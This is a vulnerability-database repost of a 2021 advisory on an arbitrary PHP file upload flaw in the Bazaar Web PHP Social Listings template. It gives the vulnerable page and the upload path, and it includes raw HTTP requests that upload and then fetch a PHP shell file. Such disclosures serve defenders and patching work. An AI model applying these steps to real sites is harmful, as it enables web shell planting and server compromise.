Monday, December 20, 2021

Bazaar Web PHP Social Listings Shell Upload

<--

# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps

1. Description

Bazaar Web PHP Social Listings script contain arbitrary file upload
registered user can upload .php files in Edit an item section without
any security

list item link :

localhost bazaar-web/list-item-info.php

edit item photos and upload php files and inspect element your php
direction

uploaded file direction

local host bazaar/uploads/yourfile.php

just right click the photo and use inspect element you will have your
direction



Host: (HOST)

Accept: */*

Accept-Language: ar,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate, br

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199

Content-Length: 63132

Connection: keep-alive

Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

file=fx.php&fileName=fx.php

GET
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php

Host: HOST

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: image/avif,image/webp,*/*

Accept-Language: ar,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt

Sec-Fetch-Dest: image

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin









#####

-->
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore